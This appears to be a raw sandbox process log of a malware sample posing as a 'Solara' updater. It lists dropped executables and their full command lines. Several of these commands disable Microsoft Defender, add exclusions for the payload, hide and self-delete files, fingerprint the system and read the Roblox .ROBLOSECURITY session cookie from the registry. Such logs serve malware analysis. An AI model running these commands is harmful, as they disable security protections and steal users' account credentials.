"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

